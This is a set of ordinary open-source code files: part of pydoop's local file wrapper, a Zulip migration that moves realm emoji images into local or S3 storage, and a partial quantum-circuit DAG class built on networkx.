        _complain_ifclosed(self.closed)
        return self.f.write(data)
    def write_chunk(self, chunk):
        """
        Write data from buffer ``chunk`` to the file.

        :type chunk: writable string buffer
        :param chunk: a c-like string buffer, such as the one returned by the
          ``create_string_buffer`` function in the :mod:`ctypes` module
        :rtype: int
        :return: the number of bytes written
        """
        _complain_ifclosed(self.closed)
        return self.f.write_chunk(chunk)
    def flush(self):
        """
        Force any buffered output to be written.
        """
        _complain_ifclosed(self.closed)
        return self.f.flush()
class local_file(file):
    # NOTE: subclasses the Python 2 built-in ``file`` type; mirrors the
    # hdfs_file API for paths that live on the local filesystem.
    def __init__(self, fs, name, flags):
        # Writing implies creating any missing parent directories first.
        if not flags.startswith("r"):
            local_file.__make_parents(fs, name)
        super(local_file, self).__init__(name, flags)
        self.__fs = fs
        self.__name = os.path.abspath(super(local_file, self).name)
        self.__size = os.fstat(super(local_file, self).fileno()).st_size
        # Mimic hdfs_file: self.f points to the raw reader (itself here).
        self.f = self
        self.chunk_size = 0
    @staticmethod
    def __make_parents(fs, name):
        d = os.path.dirname(name)
        if d:
            try:
                fs.create_directory(d)
            except IOError:
                raise IOError("Cannot open file %s" % name)
    @property
    def fs(self):
        # The file's filesystem instance.
        return self.__fs
    @property
    def name(self):
        # The file's absolute path.
        return self.__name
    @property
    def size(self):
        # Size in bytes; refreshed by close() for files opened for writing.
        return self.__size
    def write(self, data):
        # Unlike file.write, return the byte count (hdfs_file API parity).
        super(local_file, self).write(data)
        return len(data)
    def available(self):
        _complain_ifclosed(self.closed)
        return self.size
    def close(self):
        if self.mode == "w":
            # Flush user- and OS-level buffers so st_size below is accurate.
            self.flush()
            os.fsync(self.fileno())
            self.__size = os.fstat(self.fileno()).st_size
        super(local_file, self).close()
    def pread(self, position, length):
        # Positional read that preserves the current file offset.
        _complain_ifclosed(self.closed)
        old_pos = self.tell()
        self.seek(position)
        data = self.read(length)
        self.seek(old_pos)
        return data
    def pread_chunk(self, position, chunk):
        _complain_ifclosed(self.closed)
        data = self.pread(position, len(chunk))
        chunk.value = data
        return len(data)
    def read_chunk(self, chunk):
        _complain_ifclosed(self.closed)
        data = self.read(len(chunk))
        chunk.value = data
        return len(data)
    def write_chunk(self, chunk):
        _complain_ifclosed(self.closed)
        return self.write(chunk.value)
| {
"content_hash": "129571f72f2bff6771909353051a39f3",
"timestamp": "",
"source": "github",
"line_count": 353,
"max_line_length": 80,
"avg_line_length": 25.813031161473088,
"alnum_prop": 0.6209394205443372,
"repo_name": "jkahn/pydoop-code",
"id": "569cd45915d128dd90bd73cf6f509fce359eda3e",
"size": "9728",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "pydoop/hdfs/file.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "C",
"bytes": "731584"
},
{
"name": "C++",
"bytes": "513848"
},
{
"name": "Java",
"bytes": "480901"
},
{
"name": "Python",
"bytes": "291616"
},
{
"name": "Ruby",
"bytes": "9955"
},
{
"name": "Shell",
"bytes": "1945"
}
],
"symlink_target": ""
} |
import os
import io
import logging
import requests
from mimetypes import guess_type
from PIL import Image
from PIL import ImageOps
from django.db import migrations, models
from django.db import migrations
from django.db.backends.postgresql_psycopg2.schema import DatabaseSchemaEditor
from django.db.migrations.state import StateApps
from django.conf import settings
from boto.s3.key import Key
from boto.s3.connection import S3Connection
from requests import ConnectionError, Response
from typing import Dict, Text, Tuple, Optional, Union
from six import binary_type
def force_str(s, encoding='utf-8'):
    # type: (Union[Text, binary_type], Text) -> str
    """converts a string to a native string"""
    if isinstance(s, str):
        # Already the native string type for this Python version.
        return s
    elif isinstance(s, Text):
        # Python 2: unicode -> native bytes str. (On Python 3 typing.Text
        # is str, so this branch never fires there.)
        return s.encode(str(encoding))
    elif isinstance(s, binary_type):
        # bytes -> native str (Python 3 path).
        return s.decode(encoding)
    else:
        raise TypeError("force_str expects a string type")
class Uploader(object):
    """
    Base class for emoji uploaders: downloads an emoji image from a URL,
    resizes it, and hands both the resized and the original bytes to a
    storage backend. Subclasses implement ``upload_files``.
    """
    def __init__(self):
        # type: () -> None
        # Destination path layout within the storage backend.
        self.path_template = "{realm_id}/emoji/{emoji_file_name}"
        self.emoji_size = (64, 64)
    def upload_files(self, response, resized_image, dst_path_id):
        # type: (Response, binary_type, Text) -> None
        # Storage-backend hook: persist the image(s) at dst_path_id.
        raise NotImplementedError()
    def get_dst_path_id(self, realm_id, url, emoji_name):
        # type: (int, Text, Text) -> Tuple[Text,Text]
        # Build the target file name (emoji name + source extension) and its
        # full path within the backend.
        _, image_ext = os.path.splitext(url)
        file_name = ''.join((emoji_name, image_ext))
        return file_name, self.path_template.format(realm_id=realm_id, emoji_file_name=file_name)
    def resize_emoji(self, image_data):
        # type: (binary_type) -> Optional[binary_type]
        # Returns the resized image bytes, or None for animated GIFs (which
        # are stored unmodified by the callers).
        im = Image.open(io.BytesIO(image_data))
        format_ = im.format
        if format_ == 'GIF' and im.is_animated:
            return None
        im = ImageOps.fit(im, self.emoji_size, Image.ANTIALIAS)
        out = io.BytesIO()
        im.save(out, format_)
        return out.getvalue()
    def upload_emoji(self, realm_id, image_url, emoji_name):
        # type: (int, Text, Text) -> Optional[Text]
        # Download, resize and store one emoji. Returns the stored file name,
        # or None on any download/resize failure (best-effort semantics).
        file_name, dst_path_id = self.get_dst_path_id(realm_id, image_url, emoji_name)
        try:
            response = requests.get(image_url, stream=True)
        except ConnectionError:
            return None
        if response.status_code != 200:
            return None
        try:
            resized_image = self.resize_emoji(response.content)
        except IOError:
            # PIL raises IOError for images it cannot parse.
            return None
        self.upload_files(response, resized_image, dst_path_id)
        return file_name
class LocalUploader(Uploader):
    """Stores emoji files on disk below settings.LOCAL_UPLOADS_DIR/avatars."""

    def __init__(self):
        # type: () -> None
        super(LocalUploader, self).__init__()

    @staticmethod
    def mkdirs(path):
        # type: (Text) -> None
        """
        Ensure the parent directory of ``path`` exists.

        Uses EAFP (makedirs + EEXIST tolerance) instead of the original
        isdir()/makedirs() pair, which was racy: a concurrent creation of
        the same directory between the check and the call would crash.
        """
        dirname = os.path.dirname(path)
        try:
            os.makedirs(dirname)
        except OSError:
            # Re-raise unless the directory already exists.
            if not os.path.isdir(dirname):
                raise

    def write_local_file(self, path, file_data):
        # type: (Text, binary_type) -> None
        """Write ``file_data`` to ``path``, creating parent dirs as needed."""
        self.mkdirs(path)
        with open(path, 'wb') as f:
            f.write(file_data)

    def upload_files(self, response, resized_image, dst_path_id):
        # type: (Response, binary_type, Text) -> None
        """
        Store the resized emoji (or the raw download when resizing was
        skipped, e.g. animated GIFs) plus a ``.original`` copy of the raw
        download.
        """
        dst_file = os.path.join(settings.LOCAL_UPLOADS_DIR, 'avatars', dst_path_id)
        if resized_image:
            self.write_local_file(dst_file, resized_image)
        else:
            self.write_local_file(dst_file, response.content)
        self.write_local_file('.'.join((dst_file, 'original')), response.content)
class S3Uploader(Uploader):
    """Stores emoji files in the S3 avatar bucket via boto."""
    def __init__(self):
        # type: () -> None
        super(S3Uploader, self).__init__()
        conn = S3Connection(settings.S3_KEY, settings.S3_SECRET_KEY)
        bucket_name = settings.S3_AVATAR_BUCKET
        # validate=False skips a round-trip existence check on the bucket.
        self.bucket = conn.get_bucket(bucket_name, validate=False)
    def upload_to_s3(self, path, file_data, headers):
        # type: (Text, binary_type, Optional[Dict[Text, Text]]) -> None
        key = Key(self.bucket)
        key.key = path
        key.set_contents_from_string(force_str(file_data), headers=headers)
    def upload_files(self, response, resized_image, dst_path_id):
        # type: (Response, binary_type, Text) -> None
        headers = None  # type: Optional[Dict[Text, Text]]
        # Prefer the server-reported content type, falling back to guessing
        # from the destination file extension.
        content_type = response.headers.get(str("Content-Type")) or guess_type(dst_path_id)[0]
        if content_type:
            headers = {u'Content-Type': content_type}
        if resized_image:
            self.upload_to_s3(dst_path_id, resized_image, headers)
        else:
            self.upload_to_s3(dst_path_id, response.content, headers)
        # Always keep an untouched copy of the downloaded bytes as well.
        self.upload_to_s3('.'.join((dst_path_id, 'original')), response.content, headers)
def get_uploader():
    # type: () -> Uploader
    """Pick the storage backend based on the deployment's settings."""
    use_s3 = settings.LOCAL_UPLOADS_DIR is None
    return S3Uploader() if use_s3 else LocalUploader()
def upload_emoji_to_storage(apps, schema_editor):
    # type: (StateApps, DatabaseSchemaEditor) -> None
    """
    Data migration: download every realm emoji from its old img_url and
    re-upload it into the configured storage backend, recording the new
    file_name on the row.
    """
    realm_emoji_model = apps.get_model('zerver', 'RealmEmoji')
    uploader = get_uploader()  # type: Uploader
    for emoji in realm_emoji_model.objects.all():
        file_name = uploader.upload_emoji(emoji.realm_id, emoji.img_url, emoji.name)
        if file_name is None:
            logging.warning("ERROR: Could not download emoji %s; please reupload manually" %
                            (emoji,))
        # On failure, file_name stays None and the admin must re-upload.
        emoji.file_name = file_name
        emoji.save()
class Migration(migrations.Migration):
    # Adds RealmEmoji.file_name (nullable, so a failed download can be
    # recorded as None), migrates each emoji image into the configured
    # storage backend, then drops the now-redundant img_url field.
    dependencies = [
        ('zerver', '0076_userprofile_emojiset'),
    ]
    operations = [
        migrations.AddField(
            model_name='realmemoji',
            name='file_name',
            field=models.TextField(db_index=True, null=True),
        ),
        # Data migration: upload existing emoji images and fill file_name.
        migrations.RunPython(upload_emoji_to_storage),
        migrations.RemoveField(
            model_name='realmemoji',
            name='img_url',
        ),
    ]
| {
"content_hash": "3206a62f6d0dbf92c0d7f58e1a1abb3c",
"timestamp": "",
"source": "github",
"line_count": 171,
"max_line_length": 97,
"avg_line_length": 34.70175438596491,
"alnum_prop": 0.6199865183687226,
"repo_name": "amanharitsh123/zulip",
"id": "9a88727767687552cf4326ddc04d4d95a894ff04",
"size": "6008",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "zerver/migrations/0077_add_file_name_field_to_realm_emoji.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "CSS",
"bytes": "432211"
},
{
"name": "Emacs Lisp",
"bytes": "158"
},
{
"name": "HTML",
"bytes": "494378"
},
{
"name": "JavaScript",
"bytes": "2167185"
},
{
"name": "Nginx",
"bytes": "1485"
},
{
"name": "Pascal",
"bytes": "1113"
},
{
"name": "Perl",
"bytes": "401825"
},
{
"name": "Puppet",
"bytes": "86921"
},
{
"name": "Python",
"bytes": "3792729"
},
{
"name": "Ruby",
"bytes": "249744"
},
{
"name": "Shell",
"bytes": "61752"
}
],
"symlink_target": ""
} |
"""
Object to represent a quantum circuit as a directed acyclic graph.
The nodes in the graph are either input/output nodes or operation nodes.
The operation nodes are elements of a basis that is part of the circuit.
The QASM definitions of the basis elements are carried with the circuit.
The edges correspond to qubits or bits in the circuit. A directed edge
from node A to node B means that the (qu)bit passes from the output of A
to the input of B. The object's methods allow circuits to be constructed,
composed, and modified. Some natural properties like depth can be computed
directly from the graph.
"""
import itertools
import copy
import networkx as nx
from ._dagcircuiterror import DAGCircuitError
class DAGCircuit:
"""
Quantum circuit as a directed acyclic graph.
There are 3 types of nodes in the graph: inputs, outputs, and operations.
The nodes are connected by directed edges that correspond to qubits and
bits.
"""
# pylint: disable=invalid-name
def __init__(self):
    """Create an empty circuit."""
    # wire name (reg, idx) -> True for a classical bit, False for a qubit
    self.wire_type = {}
    # wire name (reg, idx) -> id of that wire's input node
    self.input_map = {}
    # wire name (reg, idx) -> id of that wire's output node
    self.output_map = {}
    # total number of graph nodes allocated so far
    self.node_counter = 0
    # operation name -> (nq, nc, np): counts of qubit args, bit args,
    # and real parameters; the actual definitions live outside this object
    self.basis = {}
    # The DAG itself.  Nodes are inputs, outputs, or operations; operation
    # nodes have equal in- and out-degree and carry argument order and
    # parameter values, inputs have out-degree 1, outputs in-degree 1.
    # Every edge is labeled with a wire name (reg, idx), and each operation
    # has matching in- and out-edges for every wire it touches.
    self.multi_graph = nx.MultiDiGraph()
    # quantum register name -> size
    self.qregs = {}
    # classical register name -> size
    self.cregs = {}
    # user-defined gate name -> AST node with its definition
    self.gates = {}
    # number of digits used when printing floats
    self.prec = 10
def get_qubits(self):
"""Return a list of qubits as (qreg, index) pairs."""
return [(k, i) for k, v in self.qregs.items() for i in range(v)]
def rename_register(self, regname, newname):
    """Rename a classical or quantum register throughout the circuit.

    regname = existing register name string
    newname = replacement register name string

    Raises DAGCircuitError if newname is already taken or if regname
    does not name an existing register.
    """
    if regname == newname:
        return
    if newname in self.qregs or newname in self.cregs:
        raise DAGCircuitError("duplicate register name %s" % newname)
    if regname not in self.qregs and regname not in self.cregs:
        raise DAGCircuitError("no register named %s" % regname)
    # Move the size entry to the new name, remembering whether this is a
    # classical register so the wire_type entries can be rebuilt below.
    iscreg = False
    if regname in self.qregs:
        self.qregs[newname] = self.qregs[regname]
        self.qregs.pop(regname, None)
        reg_size = self.qregs[newname]
    if regname in self.cregs:
        self.cregs[newname] = self.cregs[regname]
        self.cregs.pop(regname, None)
        reg_size = self.cregs[newname]
        iscreg = True
    # Re-key every per-wire map from (regname, i) to (newname, i).
    for i in range(reg_size):
        self.wire_type[(newname, i)] = iscreg
        self.wire_type.pop((regname, i), None)
        self.input_map[(newname, i)] = self.input_map[(regname, i)]
        self.input_map.pop((regname, i), None)
        self.output_map[(newname, i)] = self.output_map[(regname, i)]
        self.output_map.pop((regname, i), None)
    # Rewrite node data in place: n = node id, d = node data dict.
    for n, d in self.multi_graph.nodes_iter(data=True):
        if d["type"] == "in" or d["type"] == "out":
            if d["name"][0] == regname:
                d["name"] = (newname, d["name"][1])
        elif d["type"] == "op":
            # Rebuild the argument lists with renamed wires.
            qa = []
            for a in d["qargs"]:
                if a[0] == regname:
                    a = (newname, a[1])
                qa.append(a)
            d["qargs"] = qa
            ca = []
            for a in d["cargs"]:
                if a[0] == regname:
                    a = (newname, a[1])
                ca.append(a)
            d["cargs"] = ca
            if d["condition"] is not None:
                if d["condition"][0] == regname:
                    d["condition"] = (newname, d["condition"][1])
    # Rewrite edge labels: e1, e2 = endpoints, d = edge data dict.
    for e1, e2, d in self.multi_graph.edges_iter(data=True):
        if d["name"][0] == regname:
            d["name"] = (newname, d["name"][1])
def remove_all_ops_named(self, opname):
    """Remove every operation node whose name equals opname."""
    for node in self.get_named_nodes(opname):
        self._remove_op_node(node)
def deepcopy(self):
"""Return a deep copy of self."""
return copy.deepcopy(self)
def fs(self, number):
"""Format a float f as a string with self.prec digits."""
fmt = "{0:0.%snumber}" % self.prec
return fmt.format(number)
def add_qreg(self, name, size):
"""Add all wires in a quantum register named name with size."""
if name in self.qregs or name in self.cregs:
raise DAGCircuitError("duplicate register name %s" % name)
self.qregs[name] = size
for j in range(size):
self._add_wire((name, j))
def add_creg(self, name, size):
"""Add all wires in a classical register named name with size."""
if name in self.qregs or name in self.cregs:
raise DAGCircuitError("duplicate register name %s" % name)
self.cregs[name] = size
for j in range(size):
self._add_wire((name, j), True)
def _add_wire(self, name, isClassical=False):
"""Add a qubit or bit to the circuit.
name is a (string,int) tuple containing register name and index
This adds a pair of in and out nodes connected by an edge.
"""
if name not in self.wire_type:
self.wire_type[name] = isClassical
self.node_counter += 1
self.input_map[name] = self.node_counter
self.node_counter += 1
self.output_map[name] = self.node_counter
in_node = self.input_map[name]
out_node = self.output_map[name]
self.multi_graph.add_edge(in_node, out_node)
self.multi_graph.node[in_node]["type"] = "in"
self.multi_graph.node[out_node]["type"] = "out"
self.multi_graph.node[in_node]["name"] = name
self.multi_graph.node[out_node]["name"] = name
self.multi_graph.edge[in_node][out_node][0]["name"] = name
else:
raise DAGCircuitError("duplicate wire %s" % name)
def add_basis_element(self, name, number_qubits,
number_classical=0, number_parameters=0):
"""Add an operation to the basis.
name is string label for operation
number_qubits is number of qubit arguments
number_classical is number of bit arguments
number_parameters is number of real parameters
The parameters (nq,nc,np) are ignored for the special case
when name = "barrier". The barrier instruction has a variable
number of qubit arguments.
"""
if name not in self.basis:
self.basis[name] = (
number_qubits,
number_classical,
number_parameters)
if name in self.gates:
if self.gates[name]["n_args"] != number_parameters or \
self.gates[name]["n_bits"] != number_qubits or number_classical != 0:
raise DAGCircuitError("gate data does not match "
+ "basis element specification")
def add_gate_data(self, name, gatedata):
"""Add the definition of a gate.
gatedata is dict with fields:
"opaque" = True or False
"n_args" = number of real parameters
"n_bits" = number of qubits
"args" = list of parameter names
"bits" = list of qubit names
"body" = GateBody AST node
"""
if name not in self.gates:
self.gates[name] = gatedata
if name in self.basis:
if self.basis[name][0] != self.gates[name]["n_bits"] or \
self.basis[name][1] != 0 or \
self.basis[name][2] != self.gates[name]["n_args"]:
raise DAGCircuitError("gate data does not match "
+ "basis element specification")
def _check_basis_data(self, name, qargs, cargs, params):
"""Check the arguments against the data for this operation.
name is a string
qargs is a list of tuples like ("q",0)
cargs is a list of tuples like ("c",0)
params is a list of strings that represent floats
"""
# Check that we have this operation
if name not in self.basis:
raise DAGCircuitError("%s is not in the list of basis operations"
% name)
# Check the number of arguments matches the signature
if name != "barrier":
if len(qargs) != self.basis[name][0]:
raise DAGCircuitError("incorrect number of qubits for %s"
% name)
if len(cargs) != self.basis[name][1]:
raise DAGCircuitError("incorrect number of bits for %s"
% name)
if len(params) != self.basis[name][2]:
raise DAGCircuitError("incorrect number of parameters for %s"
% name)
else:
# "barrier" is a special case
if len(qargs) == 0:
raise DAGCircuitError("incorrect number of qubits for %s"
% name)
if len(cargs) != 0:
raise DAGCircuitError("incorrect number of bits for %s"
% name)
if len(params) != 0:
raise DAGCircuitError("incorrect number of parameters for %s"
% name)
def _check_condition(self, name, condition):
"""Verify that the condition is valid.
name is a string used for error reporting
condition is either None or a tuple (string,int) giving (creg,value)
"""
# Verify creg exists
if condition is not None and condition[0] not in self.cregs:
raise DAGCircuitError("invalid creg in condition for %s" % name)
def _check_bits(self, args, amap, bval):
"""Check the values of a list of (qu)bit arguments.
For each element A of args, check that amap contains A and
self.wire_type[A] equals bval.
args is a list of (regname,idx) tuples
amap is a dictionary keyed on (regname,idx) tuples
bval is boolean
"""
# Check for each wire
for q in args:
if q not in amap:
raise DAGCircuitError("(qu)bit %s not found" % q)
if self.wire_type[q] != bval:
raise DAGCircuitError("expected wire type %s for %s"
% (bval, q))
def _bits_in_condition(self, cond):
"""Return a list of bits (regname,idx) in the given condition.
cond is either None or a (regname,int) tuple specifying
a classical if condition.
"""
all_bits = []
if cond is not None:
all_bits.extend([(cond[0], j) for j in range(self.cregs[cond[0]])])
return all_bits
def _add_op_node(self, nname, nqargs, ncargs, nparams, ncondition):
"""Add a new operation node to the graph and assign properties.
nname node name
nqargs quantum arguments
ncargs classical arguments
nparams parameters
ncondition classical condition (or None)
"""
# Add a new operation node to the graph
self.node_counter += 1
self.multi_graph.add_node(self.node_counter)
# Update that operation node's data
self.multi_graph.node[self.node_counter]["type"] = "op"
self.multi_graph.node[self.node_counter]["name"] = nname
self.multi_graph.node[self.node_counter]["qargs"] = nqargs
self.multi_graph.node[self.node_counter]["cargs"] = ncargs
self.multi_graph.node[self.node_counter]["params"] = nparams
self.multi_graph.node[self.node_counter]["condition"] = ncondition
def apply_operation_back(self, name, qargs, cargs=None, params=None,
                         condition=None):
    """Apply an operation to the output side of the circuit.

    name -- operation name string
    qargs -- list of (regname, idx) qubit tuples
    cargs -- list of (regname, idx) bit tuples
    params -- list of strings that represent floats
    condition -- None, or a (creg_name, value) tuple

    The new node is spliced in immediately before the output node of
    every wire it touches.
    """
    # Replace the original mutable default arguments ([]) with None
    # sentinels; behavior is unchanged since they were never mutated.
    cargs = [] if cargs is None else cargs
    params = [] if params is None else params
    all_cbits = self._bits_in_condition(condition)
    all_cbits.extend(cargs)
    self._check_basis_data(name, qargs, cargs, params)
    self._check_condition(name, condition)
    self._check_bits(qargs, self.output_map, False)
    self._check_bits(all_cbits, self.output_map, True)
    self._add_op_node(name, qargs, cargs, list(map(str, params)),
                      condition)
    # Splice the new node in front of each touched output node: the old
    # predecessor now feeds the op, and the op feeds the output node.
    al = [qargs, all_cbits]
    for q in itertools.chain(*al):
        ie = self.multi_graph.predecessors(self.output_map[q])
        assert len(ie) == 1, "output node has multiple in-edges"
        self.multi_graph.add_edge(ie[0], self.node_counter, name=q)
        self.multi_graph.remove_edge(ie[0], self.output_map[q])
        self.multi_graph.add_edge(
            self.node_counter, self.output_map[q], name=q)
def apply_operation_front(self, name, qargs, cargs=None, params=None,
                          condition=None):
    """Apply an operation to the input side of the circuit.

    name -- operation name string
    qargs -- list of (regname, idx) qubit tuples
    cargs -- list of (regname, idx) bit tuples
    params -- list of strings that represent floats
    condition -- None, or a (creg_name, value) tuple

    (The original docstring described qargs/cargs as strings like
    "q[0]", but the checks and edge labels use (regname, idx) tuples,
    matching apply_operation_back.)
    """
    # Replace the original mutable default arguments ([]) with None
    # sentinels; behavior is unchanged since they were never mutated.
    cargs = [] if cargs is None else cargs
    params = [] if params is None else params
    all_cbits = self._bits_in_condition(condition)
    all_cbits.extend(cargs)
    self._check_basis_data(name, qargs, cargs, params)
    self._check_condition(name, condition)
    self._check_bits(qargs, self.input_map, False)
    self._check_bits(all_cbits, self.input_map, True)
    self._add_op_node(name, qargs, cargs, list(map(str, params)),
                      condition)
    # Splice the new node right after each touched input node: the op
    # takes over the input's old successor, and the input feeds the op.
    al = [qargs, all_cbits]
    for q in itertools.chain(*al):
        ie = self.multi_graph.successors(self.input_map[q])
        assert len(ie) == 1, "input node has multiple out-edges"
        self.multi_graph.add_edge(self.node_counter, ie[0], name=q)
        self.multi_graph.remove_edge(self.input_map[q], ie[0])
        self.multi_graph.add_edge(
            self.input_map[q], self.node_counter, name=q)
def _make_union_basis(self, input_circuit):
"""Return a new basis map.
The new basis is a copy of self.basis with
new elements of input_circuit.basis added.
input_circuit is a DAGCircuit
"""
union_basis = copy.deepcopy(self.basis)
for g in input_circuit.basis:
if g not in union_basis:
union_basis[g] = input_circuit.basis[g]
if union_basis[g] != input_circuit.basis[g]:
raise DAGCircuitError("incompatible basis")
return union_basis
def _make_union_gates(self, input_circuit):
"""Return a new gates map.
The new gates are a copy of self.gates with
new elements of input_circuit.gates added.
input_circuit is a DAGCircuit
NOTE: gates in input_circuit that are also in self must
be *identical* to the gates in self
"""
union_gates = copy.deepcopy(self.gates)
for k, v in input_circuit.gates.items():
if k not in union_gates:
union_gates[k] = v
if union_gates[k]["opaque"] != input_circuit.gates[k]["opaque"] or\
union_gates[k]["n_args"] != input_circuit.gates[k]["n_args"] or\
union_gates[k]["n_bits"] != input_circuit.gates[k]["n_bits"] or\
union_gates[k]["args"] != input_circuit.gates[k]["args"] or\
union_gates[k]["bits"] != input_circuit.gates[k]["bits"]:
raise DAGCircuitError("inequivalent gate definitions for %s"
% k)
if not union_gates[k]["opaque"] and \
union_gates[k]["body"].qasm() != \
input_circuit.gates[k]["body"].qasm():
raise DAGCircuitError("inequivalent gate definitions for %s"
% k)
return union_gates
def _check_wiremap_registers(self, wire_map, keyregs, valregs,
                             valreg=True):
    """Check that wiremap neither fragments nor leaves duplicate registers.

    1. There are no fragmented registers. A register in keyregs
    is fragmented if not all of its (qu)bits are renamed by wire_map.
    2. There are no duplicate registers. A register is duplicate if
    it appears in both self and keyregs but not in wire_map.

    wire_map is a map from (regname,idx) in keyregs to (regname,idx)
    in valregs
    keyregs is a map from register names to sizes
    valregs is a map from register names to sizes
    valreg is a Bool, if False the method ignores valregs and does not
    add regs for bits in the wire_map image that don't appear in valregs

    Return the set of regs to add to self
    """
    add_regs = set([])
    # register name -> {index: True if wire_map renames that bit}
    reg_frag_chk = {}
    for k, v in keyregs.items():
        reg_frag_chk[k] = {j: False for j in range(v)}
    for k in wire_map.keys():
        if k[0] in keyregs:
            reg_frag_chk[k[0]][k[1]] = True
    for k, v in reg_frag_chk.items():
        # NOTE(review): k is a register name *string*, so this joins its
        # characters with commas (e.g. "qr" -> "q,r"); the message looks
        # odd but is only used in error text -- confirm before changing.
        rname = ",".join(map(str, k))
        s = set(v.values())
        if len(s) == 2:
            # Mixed True/False: only some bits of the register are mapped.
            raise DAGCircuitError("wire_map fragments reg %s" % rname)
        elif s == set([False]):
            # No bit of this register is mapped: it must not collide
            # with a register already in self.
            if k in self.qregs or k in self.cregs:
                raise DAGCircuitError("unmapped duplicate reg %s" % rname)
            else:
                # Add registers that appear only in keyregs
                add_regs.add((k, keyregs[k]))
        else:
            if valreg:
                # If mapping to a register not in valregs, add it.
                # (k,0) exists in wire_map because wire_map doesn't
                # fragment k
                if not wire_map[(k, 0)][0] in valregs:
                    # Required size = 1 + highest target index used
                    # for that destination register.
                    size = max(map(lambda x: x[1],
                                   filter(lambda x: x[0]
                                          == wire_map[(k, 0)][0],
                                          wire_map.values())))
                    add_regs.add((wire_map[(k, 0)][0], size + 1))
    return add_regs
def _check_wiremap_validity(self, wire_map, keymap, valmap, input_circuit):
"""Check that the wiremap is consistent.
Check that the wiremap refers to valid wires and that
those wires have consistent types.
wire_map is a map from (regname,idx) in keymap to (regname,idx)
in valmap
keymap is a map whose keys are wire_map keys
valmap is a map whose keys are wire_map values
input_circuit is a DAGCircuit
"""
for k, v in wire_map.items():
kname = ",".join(map(str, k))
vname = ",".join(map(str, v))
if k not in keymap:
raise DAGCircuitError("invalid wire mapping key %s" % kname)
if v not in valmap:
raise DAGCircuitError("invalid wire mapping value %s"
% vname)
if input_circuit.wire_type[k] != self.wire_type[v]:
raise DAGCircuitError("inconsistent wire_map at (%s,%s)"
% (kname, vname))
def _map_condition(self, wire_map, condition):
"""Use the wire_map dict to change the condition tuple's creg name.
wire_map is map from wires to wires
condition is a tuple (reg,int)
Returns the new condition tuple
"""
if condition is None:
n_condition = None
else:
# Map the register name, using fact that registers must not be
# fragmented by the wire_map (this must have been checked
# elsewhere)
bit0 = (condition[0], 0)
n_condition = (wire_map.get(bit0, bit0)[0], condition[1])
return n_condition
def compose_back(self, input_circuit, wire_map=None):
    """Apply the input circuit to the output of this circuit.

    The two bases must be "compatible" or an exception occurs.
    A subset of input qubits of the input circuit are mapped
    to a subset of output qubits of this circuit.
    wire_map[input_qubit_of_input_circuit] = output_qubit_of_self
    """
    # Replace the original mutable default ({}) with a None sentinel;
    # behavior is unchanged since the map is only read.
    wire_map = {} if wire_map is None else wire_map
    union_basis = self._make_union_basis(input_circuit)
    union_gates = self._make_union_gates(input_circuit)
    # Check the wire map for duplicate values
    if len(set(wire_map.values())) != len(wire_map):
        raise DAGCircuitError("duplicates in wire_map")
    add_qregs = self._check_wiremap_registers(wire_map,
                                              input_circuit.qregs,
                                              self.qregs)
    for register in add_qregs:
        self.add_qreg(register[0], register[1])
    add_cregs = self._check_wiremap_registers(wire_map,
                                              input_circuit.cregs,
                                              self.cregs)
    for register in add_cregs:
        self.add_creg(register[0], register[1])
    self._check_wiremap_validity(wire_map, input_circuit.input_map,
                                 self.output_map, input_circuit)
    # Compose
    self.basis = union_basis
    self.gates = union_gates
    topological_sort = nx.topological_sort(input_circuit.multi_graph)
    for node in topological_sort:
        # BUG FIX: the loop variable was "node" but the lookup used the
        # undefined name "n", so every call raised NameError here.
        nd = input_circuit.multi_graph.node[node]
        if nd["type"] == "in":
            # if in wire_map, get new name, else use existing name
            m_name = wire_map.get(nd["name"], nd["name"])
            # the mapped wire should already exist
            assert m_name in self.output_map, \
                "wire (%s,%d) not in self" % (m_name[0], m_name[1])
            assert nd["name"] in input_circuit.wire_type, \
                "inconsistent wire_type for (%s,%d) in input_circuit" \
                % (nd["name"][0], nd["name"][1])
        elif nd["type"] == "out":
            # ignore output nodes
            pass
        elif nd["type"] == "op":
            condition = self._map_condition(wire_map, nd["condition"])
            self._check_condition(nd["name"], condition)
            m_qargs = list(map(lambda x: wire_map.get(x, x), nd["qargs"]))
            m_cargs = list(map(lambda x: wire_map.get(x, x), nd["cargs"]))
            self.apply_operation_back(nd["name"], m_qargs, m_cargs,
                                      nd["params"], condition)
        else:
            assert False, "bad node type %s" % nd["type"]
def compose_front(self, input_circuit, wire_map=None):
    """Apply the input circuit to the input of this circuit.

    The two bases must be "compatible" or an exception occurs.
    A subset of output qubits of the input circuit are mapped
    to a subset of input qubits of this circuit.
    wire_map[output_qubit_of_input_circuit] = input_qubit_of_self
    """
    # Replace the original mutable default ({}) with a None sentinel;
    # behavior is unchanged since the map is only read.
    wire_map = {} if wire_map is None else wire_map
    union_basis = self._make_union_basis(input_circuit)
    union_gates = self._make_union_gates(input_circuit)
    # Check the wire map
    if len(set(wire_map.values())) != len(wire_map):
        raise DAGCircuitError("duplicates in wire_map")
    add_qregs = self._check_wiremap_registers(wire_map,
                                              input_circuit.qregs,
                                              self.qregs)
    for r in add_qregs:
        self.add_qreg(r[0], r[1])
    add_cregs = self._check_wiremap_registers(wire_map,
                                              input_circuit.cregs,
                                              self.cregs)
    for r in add_cregs:
        self.add_creg(r[0], r[1])
    self._check_wiremap_validity(wire_map, input_circuit.output_map,
                                 self.input_map, input_circuit)
    # Compose
    self.basis = union_basis
    self.gates = union_gates
    # Walk the input circuit in reverse topological order so each
    # operation is prepended after the ones that follow it.
    ts = nx.topological_sort(input_circuit.multi_graph, reverse=True)
    for n in ts:
        nd = input_circuit.multi_graph.node[n]
        if nd["type"] == "out":
            # if in wire_map, get new name, else use existing name
            m_name = wire_map.get(nd["name"], nd["name"])
            # the mapped wire should already exist
            assert m_name in self.input_map, \
                "wire (%s,%d) not in self" % (m_name[0], m_name[1])
            assert nd["name"] in input_circuit.wire_type, \
                "inconsistent wire_type for (%s,%d) in input_circuit" \
                % (nd["name"][0], nd["name"][1])
        elif nd["type"] == "in":
            # ignore input nodes
            pass
        elif nd["type"] == "op":
            condition = self._map_condition(wire_map, nd["condition"])
            self._check_condition(nd["name"], condition)
            m_qargs = list(map(lambda x: wire_map.get(x, x), nd["qargs"]))
            m_cargs = list(map(lambda x: wire_map.get(x, x), nd["cargs"]))
